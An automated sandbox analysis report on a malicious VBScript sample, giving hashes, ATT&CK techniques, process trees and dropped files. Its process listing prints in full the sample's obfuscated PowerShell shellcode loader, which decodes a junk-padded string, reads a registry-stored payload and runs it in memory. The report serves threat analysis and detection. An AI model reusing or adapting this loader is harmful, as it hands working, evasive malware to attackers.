8134cd2cdc9e2de14e9e7c172cf0d21f4487b2a6138cee7cfe31aaf3e51cea38

General

Target

swift_171122_004282741.vbs
Size

370KB
MD5

a82f7d67394a27c89d9b031cd33519dc
SHA1

8c8380b6ee1c7fa18d81bc3c13a5d47513e541ce
SHA256

9c19f70567380da124d3cf07402a79b0801bc075a9b58e22055a489f801823ed
SHA512

38f536ba12de9d4534cf45217b8615fcbd548d9d412b72d27368c9c224a450aeff0b7fd82c5d8e2529f7e57216a5a8902f9448de3c5438f0b00aa8d7a5ae9ec3
SSDEEP

6144:fkC1Fb24JNP0SzlXIy4Mpig4bp+Yz+bIaXZ3xrIWIUzkIsZ/sImKIfx/skINxF0B:DFb2aP0StIy4E4l+PDf+O

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2752 932 WerFault.exe powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

932 powershell.exe
932 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 932 powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe

pid	pid_target	process	target process
2752	932	WerFault.exe	powershell.exe

pid	process
932	powershell.exe
932	powershell.exe

description	pid	process
Token: SeDebugPrivilege	932	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

WScript.exepowershell.execsc.exe

description	pid	process	target process
PID 3988 wrote to memory of 960	3988	WScript.exe	cmd.exe
PID 3988 wrote to memory of 960	3988	WScript.exe	cmd.exe
PID 3988 wrote to memory of 932	3988	WScript.exe	powershell.exe
PID 3988 wrote to memory of 932	3988	WScript.exe	powershell.exe
PID 3988 wrote to memory of 932	3988	WScript.exe	powershell.exe
PID 932 wrote to memory of 4992	932	powershell.exe	csc.exe
PID 932 wrote to memory of 4992	932	powershell.exe	csc.exe
PID 932 wrote to memory of 4992	932	powershell.exe	csc.exe
PID 4992 wrote to memory of 3656	4992	csc.exe	cvtres.exe
PID 4992 wrote to memory of 3656	4992	csc.exe	cvtres.exe
PID 4992 wrote to memory of 3656	4992	csc.exe	cvtres.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\swift_171122_004282741.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3988

C:\Windows\System32\cmd.exe
cmd /c echo C:\Windows
2⤵
PID:960

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Bestea = """MergeAAbettdStatsdKoran-TelepTOvermyIndbapIndpieBatho Grown-DermaTOboisyFalkepRealseOpereDpolloeAnatmfReguliSynennOpdraiMilletskoveiByousoNonsanClean Holla'CiconuUdstesFavouiRekurnRegragLystg tomtiSLarynySnapssPalaetByudveDiscomBitin;ArbejuHemmesKalkbiForsknAzotegFodre KantoSTilbayProtosAutoatStudeepinatmKonti.PrebuRAbsinudiskrnOntogtImmoriNedstmStrideJaege.ArveoImatisnOverdtLakrieBrandrUnfanoReadvpSprinSInsemePelserCytogvEkspriUstilcBigmoeBrunhsRakle;vinbjpArresuManvrbStetilDisksiObtencIndha TinsesFrikatUnilaaFladptPlotziGarrucOvers hjvancKomedlBioscaFunctsUbekvsRepro DochmDCockaiRattlsEjno cFde DaAfhvllFormadSkede1mopan{Hoop [DecafDReduplDybdelIndgaIAssafmInchapStaaloConnerThanatMelet(Reuni`"""helbrATrichDRedebVAmtsrALntilPStibiIBalan3Conne2Porki.ErstaDGluceLPlankLteleo`"""klumm)Konfe]BrainpTeskeuFrstebCsp ClAere iUntipcPians TonalsBiprotSemidaaastetjudahiChamocCirce MindseKittexSlegftVascueStadirPseudnAnlbe HerreiUndernskatttExacu GenhrSSindseSignatMisvkASecohcaccoulArtsnIEfternTilbafMistaoFaarerBarsemPauncaSemidtpseudiCentioNonefnUnder(UnperiFortrnUdsnitGtema GlobeVFerroeBathelGentogBroch,favorihypopnJealotSynde AnimaFRetoraChillvBorghoOer S,GrammiSrbehnWerootcatac WrongNOvercoLnsatnUla EdCoupj,HexapiEkspenOrthotFlang ila sSDaabspTsk PoSmrblukvind)Tavle;Polyp[TenmaDKreatlgaraglSkoleIKluntmShylopUnsneoVidnerInvultSikke(Markf`"""GrundselecthFadebeUnderlMetaplBoatk3Unter2Bardu.ReplodFrumelPakehlBivaa`"""funkt)Diadr]VejrfpDagosukanflbenfielSporviGldsfcBjerg JuditsCactatPostpaSandstSaaniiPlanlcTilbu doradeCommuxBreestBlackefarisrFitzgnUnaci QuailiVilkanNonvatSuper NedkoDHreceuSemifpboanelEfteriRatiocAfburaAfluktLednieForhaIBybuscFetisoMassanCleat(BogmaiskaksnAfvejtLille SicklFAlteraBunkrsIntertRoperlFangs,IrrefiMetrinPaeantBespo SelspTBadravDaaneaSlumr)Crebr;Funkl[BegynDNeogulCommilUnsecIBogbimTranspBlkkeoProstrFeltwtminit(Udski`"""InteruBrudesClaireInadvrBrnes3Dumpe2Trass`"""Skrib)Hjael]ChopipUnderuProdubruskulgenskiMinercKlass selahsWithttTagreaCounttLoraniLgnhacPoole AntageInterxLivsmtSwathestrucrHygienFnise BajonicultunTrasstHyalu BhokrGDoxoleOctodttittlCPlantlCrawliElutrpDartabEndeloEnnuyaRafterPipiddHumbuVSucraigtefleProgrwBarseeBleedrPermi(Nonli)Nedsl;Necta[BotanDForsnlTakkelAfvrgIFantamdemerpBestooPinnarInfratGeorg(Altin`"""approgTopfodBrshaiKlere3Slags2Denty`"""Vedli)Dobbe]ToplepSkalpuToivebBortflUnchaiBillecNonco MaurisNonadtForruaPantetIndskiNonopcBlemo IntegeOnionxYdergtSunnieChlamrBasilnCenta NoncoiProtenSkridtPrveb ViderGSoveseOrthotAdmonWCoursiFilmsnHydrodUnfacoJambewUnseaEYpurixBrigitInditEUnmixxUnran(TralliAnimanTilhotTilsy IntegSSymbojBesvaiblkstpForbr,GryntiIndesnExtrotPrinc ForudpalmonrHeroieSaxo eMarrodSchrouproud)Twirl;fissi[ModtaDFjernlPseudlAnvenIMetavmLigkipMunkeoRulskrSupertBruna(Measl`"""KabinkFrugaeAntiurEvangnForhaeNetfilTelek3Theoc2Yods `"""Gutte)Aften]DebutpGradyuTrywobBiblilOutlaiSickrcUnpan lignisGuzzltZankeaUnfactEliteiAffrdcFinpu RolleeRestkxStruttCeneseUndisrModtanVitil ShavevElgkooStanniFlgesdmalme BookmGSlmmeeAffiltMoqueSTungetErhveaskrivrMaatttManhauArd SpMosegIUnpronRequifCompuoScath(AkseliNedklnCapittEnsar StrenmGardeiUnacccEndoskVeridsPrionkunder)Skife;Vesic[AccenDgelatlCocoblVkstrIJaguamForklpBeskyoEksekrNappetUnico(Ldrei`"""SnagegFortrdDihydiStyks3Dadai2Shed `"""Ateli)Telef]VirkepGastruGned bPulsalSvaneiBreezcShetl Leet sInsultAmidoaTkkeltCodifiBrandcTorbi lssaleSateexSmovstPredaeundetrHypopnbesty KonjuiGnathnWattmtCount SpeccRAfliveOmviscStorvtRegloVCannoiAdelssBundmiEdifibPoesilAntireBagud(RessoiExaudnMauqutAnnua PargiPSkattrDisbuoUdfludVkstrutilgi,TeutoineonanBalattBisku ForanMLovniuMuligtBusteaBugen)Emmen;Jarra[StounDFalkelBarralRomneIskndimKnallpSexolosullarStoertSorpt(Inode`"""ItaligSaccodTilskiMorak3tapa 2Cunni`"""Grain)Filos]EpizopWattluPrefrbSkiftlOveraistelpcDaphn RennasMicostElephaSighstBradyiExotecSauna SpeciePlasmxDialytSubgeeVairerFilmfnStedb TardyiAzorinSatintdikdi RomerBFalseiDiplotEnergBAdvoclRethrtUdpos(VinyliRappenMyeletbaadf VermiPAlcohaNeutrsReptisAktrioPhyso,NonabiKankinBrandtGusse AndanKBalfaoAmazubMillilPresseSpade,TsotsiHambonTerritTroos PlaceAMomusnEdentlomheggTegnesGreen,PartiiSyrinnKonsutRewok FlintLMaaltocomarwNulpuiAgathnZestf,OsciliIndtrnHarostSejlg DrejeTBreraicardulSimarkTabb eClogg,separiSymbonChamptWokow AdjudoWirempLorelbLabor,hjordiExactnPoppatPunkt TalmaUFriginTriumgArkitaindisiSocia,MarkuiPortenSvmmetBigwi ProduHAutomeKonveaNuancdReinswTeleg,GlutaiOvernnHallutRende RuelsdKnollaRegremSkyggbAirbu)Forli;Barfr[CitizDPurislUdflylTilkaIBeboemAmatrpCretooPenalrFerritHeter(South`"""SponskNavleeSweetrSkratnPainfeChecklreuma3Subho2Uddan`"""Seksu)Kunst]TiwazpTroguuNannybEmblelEtiquiHematcKolon rabbesFalmntfasnaaEnsfatHandiiOvnhuctegua semireReanvxSensitNordceOdontrUbestnMilie TilleiAfgrsnbaryctThew LinebVSlagliNedarrquaggtSynsruFabriaFyldnlVekseAMultilInstalFlyveoteachcFreti(CanceiUdfornServitJebus EserivRustr1Reson,CloisiProtrnHermetBands IodinvTakst2Statu,CenteiMaalbnFanebtDrago KntrevUnbur3Telef,StoryiForvenmorgetSussy BestyvDeifi4brugs)maart;Drank[EndleDAirmolCort lHandlIEcdysmForstpGynaeoEnglerKinemtdolic(Cerem`"""nonthAMeddeDDamebVCloysASlagvPChansIAlaba3Semic2Reaff.DuarcDMarxiLStatuLForbr`"""Genio)unlaw]StonepMizenuBaronbBilralAbonnifratrcNabor UrnerseuclitEllehaparantPseudiApoutcVi Tr tenneedeterxkatoltStalaearararRefranMorat MiscoiMisplnPneumtOpvel FremrRIngenemethogPhiliFNightlInteruFornusLiposhMiljeKUdkikeAmnioyRaptu(DukesiAktienSpecitUndis UnderfToppeuAdiaplTopta)Brest;Leias[domstDConsplSodamlReninIAttramKolumpSaracoCarpirDefeatKonvo(Micro`"""VaabeuStjrtsundereSanderSluts3Valgf2Angor`"""Bezoa)promp]FortrpOste uNotelbDrogelAppliiDispocPrgen TerresGeneatAvocaaExpectStatsiUnmencUnmon KorsteRimfrxUndertBjlkeeNiobarPuddenBenze HyposIRevsenrapidtPostvPMenditMeretrAnled ElastEoversneternuImmatmHegl WOrthiiBrugenFuldtdSurteoSqueewregenSmarvetBeakeaKirketDataeiJolleoUdartnBistasspillWHoved(OutpruHstpaiyandenEkspetFlocc SceptvPoste1Zitzi,LengeieskatnKontrtUtilb FristvAgurk2Drabs)Ufuld;Lande}Smags'Brdte;Smsyn`$HornaDTungeiHellbsAnnamcTalshagarmelTeleddMoney3Nordo=Athyr[GlaivDLatiniDecidsExactcdeictaFastglSnow dDesol1Orkes]Petti:Skage:ForbjVNickeiLustirDetaitPosthubagdraModerlFaderAVersilForellCompeoPolarcAnden(Overc0Nonou,Polit1Nonra0Stuff4Vandk8Strog5Levit7Enkel6Crimi,Dagtj1Forma2Takne2samor8Fasts8Opert,Haand6Renna4Abteg)Padde;Scava`$AdmirFcareeoPradorFornehNonhaoPrintlmaybedNondeeUnesclHeksa=Skrik(BagerGNonfreSgelntRetsk-BellhIInga tSammeeAendrmSudsePRammerGleanosildepSpareeGreenrTigertDoedsyCourt Rekon-RestsPKnapsamispotFejlrhTekst Berig'VelprHGravmKImpetCUnbeaUpaake:Srska\LanceVAlloklHalvnaLowbrdMyxoiaDissiaLyoly\PenduMTrkfuaForderSnylttTiminysddonrFostedHydradGlatnaBaneg'Grill)Tiltu.DisplDTusinrTiltreLob EnFoundgFaldseStrukblkkesaHomoerOverd;Semae`$VandgRCologhFloreeAcetyoudbudlHmorioFrior Sylte=Tofag Huski[sportSungenyMiljpsPerpettrovreFgtekmBesti.FrgetCphytooGjernnMexicvLimu eSublurblyantBankb]Typec:Skotj:InterFSpdbarSekteomouthmGrundBStencaCuttysMiliteTrans6Restr4GanglSbandetMorfirHyperiBagstnAffalgBesta(Udsta`$SundrFHjlpeoOutvorDelophEndocoTyg AlDistidKneadePositlJubil)Baand;Apico[GulvbSAgamiyForsysunreptSljfeeUdtagmUnder.fremrRSuboruXylonnRegeltConsuiTriramAdvereTrisu.DolkeIAver nGardetBilleeteknorAlveuoiberepAttriSThilleFragmrUnrotvChoriiAcmiscKerateKildesKrest.PreseMCognoaHyperrRumfasSllethMoralaStumplBygni]Trkni:fored:MargaCIndskoSyncrpTroglyunder(Vista`$PaataRAcarohTilgoeOvertoCreatlAdspuoStepe,Bjerg Smuth0Tyrke,Uncal Udbor Batik`$OutbrDStabiiBagstsusselcEmanaastrmklForeldOphid3Model,Rescu Delpr`$LandsRPokanhKamfeeNulstoBlocklLeptooCockp.WendicEnebooDmarcuHomesngammattilta)Cicat;Phleb[sulphDShabeiStripsUnequcSissiadeplolHamzadComor1Clado]Water:verme:AllerEKarmanSlippuSchelmKabinWSnapsiOmbrynEuthydKompeoFormiwSkydeSAscertSupraaTailytRingliDkmanoDecrenLflassCaterWSampl(Delst`$ParabDUncariDecimsCeraucKonseaAmpullJase dFerme3Tenac,Tmmer Sirup0Polyt)Opad #Calot;""";Function Discald4 { param([String]$HS); For($i=5; $i -lt $HS.Length-1; $i+=(5+1)){ $Hypostat = $Hypostat + $HS.Substring($i, 1); } $Hypostat;}$Unofficial0 = Discald4 'resbeIKvsteEPandeXHings ';$Unofficial1= Discald4 $Bestea;& ($Unofficial0) $Unofficial1;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:932

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vodbdolh\vodbdolh.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:4992

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE5C1.tmp" "c:\Users\Admin\AppData\Local\Temp\vodbdolh\CSC35EEC5BA82C1431E991DBEE17ED3ED88.TMP"
4⤵
PID:3656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 2180
3⤵
- Program crash
PID:2752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 932 -ip 932
1⤵
PID:316

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESE5C1.tmp
Filesize
1KB

MD5
886934d6e5985120a90d8cacece2239d

SHA1
b4b7eb8157606ca4d907afb29782eb6c7a70046b

SHA256
85b2e475c72d7ee50e32a20eebe5c16da816cba015b5ca8b06280fe2c77e7d18

SHA512
e592dd1456aa8e27577458a158958fc19534193a5244d690213ea5b02151412fa6a52d5b24f37d0c7d31b051b59a3194022fc2e91625ddaa8ef465f1a1340996

Download Submit
C:\Users\Admin\AppData\Local\Temp\vodbdolh\vodbdolh.dll
Filesize
4KB

MD5
75b5f507d89ede21fbc371bdb19e7124

SHA1
78df6e245c1d3c6940ee9fef2f6b27a7f7715280

SHA256
2555f29457c7ff1d4bee998b1540f7771428afa0d6b8e6ad201bae9141983296

SHA512
195d2c65f1a5ab0037b23a146398e4a67532b6a91689d7b793a92fe3a6883a5b4c1e7c24250b69126c01a96decb653a468317706804d66cf04fe92c739c0a021

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vodbdolh\CSC35EEC5BA82C1431E991DBEE17ED3ED88.TMP
Filesize
652B

MD5
b2d85c7ea928d9c55d1274622806d29d

SHA1
7dbc7bb5609d522926cdcfa81723ed85b54bbb9a

SHA256
13f39ef5ae465f591f8a91e23a653ea12e51dfedf1058bcffdbff01ecf735c63

SHA512
8269ddfae8fcfaf617c3d74f77233ed9d2e9b65de333e4d08fe7dc717ba6f3dc8605db19b0460fa745ef16abdbe24e0fec273825086d1582d343f34c3326a090

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vodbdolh\vodbdolh.0.cs
Filesize
963B

MD5
2b12136b78b40404d47f0640d466df7b

SHA1
457f4f2727d678a37fed9ffc11444737ca1dbc4b

SHA256
31cf0506cb4748ceaa97794b3dafb0f1584326712d875234d5451f2df512e143

SHA512
66f4938ec8b54df1976a750ae554ea7a33db6d1d9cd925da3a44698807f45575d6ed180d9414f0a83ac3f32fc8496b5020fba9ab0bf1bdb4a56864037ca57330

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vodbdolh\vodbdolh.cmdline
Filesize
369B

MD5
dcd86edf01070c0e80481d4105682d8a

SHA1
46b22b1becf73b899b191b8c9ec80450a085d126

SHA256
49ee66fa4a6b28d8595e04287d189f17e45fe3578ee72d679982b6620c439327

SHA512
f45189cfd715081971d74cb0b7bd2c162ae22b6d56d2533ac856533a4115e8faa1c5b9a42b8d1470db71b8596fd313284a5b990f6f2da18be104371bd49d02d7

Download Submit
memory/932-137-0x00000000058D0000-0x0000000005936000-memory.dmp

Filesize
408KB

Download
memory/932-150-0x00000000079E0000-0x0000000007A02000-memory.dmp

Filesize
136KB

Download
memory/932-139-0x00000000066F0000-0x000000000670E000-memory.dmp

Filesize
120KB

Download
memory/932-140-0x0000000007F20000-0x000000000859A000-memory.dmp

Filesize
6.5MB

Download
memory/932-141-0x0000000006C80000-0x0000000006C9A000-memory.dmp

Filesize
104KB

Download
memory/932-153-0x00000000078A0000-0x0000000007F1A000-memory.dmp

Filesize
6.5MB

Download
memory/932-152-0x00000000078A0000-0x0000000007F1A000-memory.dmp

Filesize
6.5MB

Download
memory/932-136-0x0000000005830000-0x0000000005852000-memory.dmp

Filesize
136KB

Download
memory/932-151-0x0000000008B50000-0x00000000090F4000-memory.dmp

Filesize
5.6MB

Download
memory/932-135-0x00000000059A0000-0x0000000005FC8000-memory.dmp

Filesize
6.2MB

Download
memory/932-134-0x0000000002DF0000-0x0000000002E26000-memory.dmp

Filesize
216KB

Download
memory/932-133-0x0000000000000000-mapping.dmp

Download
memory/932-149-0x0000000007A50000-0x0000000007AE6000-memory.dmp

Filesize
600KB

Download
memory/932-138-0x00000000060C0000-0x0000000006126000-memory.dmp

Filesize
408KB

Download
memory/960-132-0x0000000000000000-mapping.dmp

Download
memory/3656-145-0x0000000000000000-mapping.dmp

Download
memory/4992-142-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing